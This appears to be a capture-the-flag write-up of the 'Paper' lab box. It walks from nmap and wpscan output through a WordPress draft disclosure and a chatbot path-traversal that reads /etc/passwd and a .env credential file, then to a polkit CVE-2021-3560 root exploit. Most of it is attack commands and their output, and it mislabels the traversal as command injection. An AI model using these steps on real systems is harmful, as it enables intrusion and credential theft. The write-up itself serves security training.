November 19, 2022 at 8:08 PM
Enjoy!

NMAP

[code]
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- -T4 10.10.11.143
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 12:31 EST
Nmap scan report for 10.10.11.143
Host is up (0.24s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/18%OT=22%CT=1%CU=36529%PV=Y%DS=2%DC=T%G=Y%TM=6210646
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   239.51 ms 10.10.14.1
2   239.64 ms 10.10.11.143

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.23 seconds
[/code]

After we see that port 80 is open, just navigate to it; with Inspect Element → Network we can see a strange header.

Add this domain to /etc/hosts and navigate to office.paper. After that we can notice that this subdomain runs WordPress.

[code]
┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url http://office.paper/ --enumerate u,ap
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://office.paper/ [10.10.11.143]
[+] Started: Fri Feb 22 13:12:02 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
 |  - X-Powered-By: PHP/7.2.24
 |  - X-Backend-Server: office.paper
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://office.paper/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://office.paper/index.php/feed/, https://wordpress.org/?v=5.2.3
 |  - http://office.paper/index.php/comments/feed/, https://wordpress.org/?v=5.2.3
[/code]

And we can notice that the version is 5.2.3; now we can find a CVE for this version here: https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2

So we can use: http://office.paper/?static=1

And we got some disclosure:

[code]
test

Micheal please remove the secret from drafts for gods sake!

Hello employees of Blunder Tiffin,
Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
So, I kindly request you all to take your discussions from the public blog to a more private chat system.
-Nick

# Warning for Michael
Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick

Threat Level Midnight
A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT
[INT:DAY]
Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….

# Secret Registration URL of new Employee chat system
http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
# Also, stop looking at my drafts. Jeez!
[/code]

So now navigate to this website, but remember to add it to /etc/hosts: http://chat.office.paper/register/8qozr226AhkCHZdyY

Register an account here and log in. After a little bit of time, a pop-up will appear with a general chat. Now we can see that this bot uses its own commands like this:

[code]
Hello. I am Recyclops. A bot assigned by Dwight. I will have my revenge on earthlings, but before that, I have to help my Cool friend Dwight to respond to the annoying questions asked by his co-workers, so that he may use his valuable time to... well, not interact with his co-workers.
Most frequently asked questions include:
- What time is it?
- What new files are in your sales directory?
- Why did the salesman crossed the road?
- What's the content of file x in your sales directory? etc.
Please note that I am a beta version and I still have some bugs to be fixed.
How to use me ? :
1. Small Talk:
You can ask me how dwight's weekend was, or did he watched the game last night etc.
eg: 'recyclops how was your weekend?' or 'recyclops did you watched the game last night?' or 'recyclops what kind of bear is the best?
2. Joke:
You can ask me Why the salesman crossed the road.
eg: 'recyclops why did the salesman crossed the road?'
<=====The following two features are for those boneheads, who still don't know how to use scp. I'm Looking at you Kevin.=====>
For security reasons, the access is limited to the Sales folder.
3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file src/test.php' or just 'recyclops file test.txt'
4. List:
You can ask me to list the files
5. Time:
You can ask me to what the time is
eg: 'recyclops what time is it?' or just 'recyclops time'
[/code]

The bot uses this recyclops to communicate with the localhost, but we can't talk in this chat because it is "read only", so let's communicate with the bot privately and try to use this command.

[code]
recyclops file ../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd:x:998:996:User for polkitd:/:/sbin/nologin
geoclue:x:997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws:x:996:993:User for cockpit-ws:/:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
unbound:x:995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:x:994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony:x:993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt:x:992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:x:991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq:x:985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
clevis:x:984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd:x:983:981:User for sssd:/:/sbin/nologin
colord:x:982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot:x:981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire:x:980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup:x:979:977::/run/gnome-initial-setup/:/sbin/nologin
insights:x:978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:x:977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod:x:976:974:mongod:/var/lib/mongo:/bin/false
rocketchat:x:1001:1001::/home/rocketchat:/bin/bash
:x:1004:1004::/home/:/bin/bash
[/code]

After that we can enumerate the users and we will find the correct password:

[code]
recyclops file ../hubot/.env
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
[/code]

Now we can log in via SSH with this password! Command injection successful.

[code]
[@paper ~]$ cat user.txt
FLAG HERE :)
[/code]

VERTICAL PRIVESC

Now we can notice a file in the user directory that recalls an exploit:

[code]
print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
print("Exploit code written by Ahmad Almorabea @almorabea")
print("Original exploit author: Kevin Backhouse ")
print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
print ("**************")
print("[+] Starting the Exploit ")
[/code]

Download this exploit and use it several times.

[code]
[@paper ~]$ python3 CVE-2021-3560.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit 
[+] User Created with the name of ahmed
[+] Timed out at: 0.008008275505860037
[+] Timed out at: 0.00782768600159978
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 
bash: cannot set terminal process group (118347): Inappropriate ioctl for device
bash: no job control in this shell
[root@paper ]# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
[/code]

Got it, we are ROOT.
